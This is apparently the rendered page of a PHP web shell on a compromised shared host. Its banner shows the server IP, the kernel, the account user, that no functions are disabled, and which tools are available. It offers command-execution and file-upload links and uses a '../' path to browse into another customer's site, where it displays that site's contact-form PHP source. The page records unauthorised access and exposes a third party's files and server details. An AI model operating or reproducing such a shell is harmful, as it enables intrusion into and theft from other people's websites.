Server IP : 103.53.40.154 / Your IP : 3.133.107.11 Web Server : Apache System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64 User : ppcad7no ( 715) PHP Version : 8.2.25 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0750) : /home2/ppcad7no/fastelevator.in/../akelectricalsrepairing.com/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<?php //get data from form $name = $_POST['c_name']; $email= $_POST['c_email']; $message= $_POST['c_message']; $mobile= $_POST['c_phone']; $city= $_POST['c_city']; // $item= $_POST['item']; // $brand= $_POST['brand']; // $model= $_POST['model']; // $serial= $_POST['serial']; $to = "info@raorepairingcentre.com"; //admin official mail $subject = "Lead From Website"; $txt ="Name = ". $name . "\r\n Email = " . $email . "\r\n Message =" . $message. "\r\n Mobile Number =" . $mobile; $headers = "From: noreply@raorepairingcenter.com" . "\r\n" . "CC: somebodyelse@example.com"; if($email!=NULL){ mail($to,$subject,$txt,$headers); } //redirect echo ("<script LANGUAGE='JavaScript'> window.alert('Succesfully sent'); window.location.href='index.php'; </script>"); ?>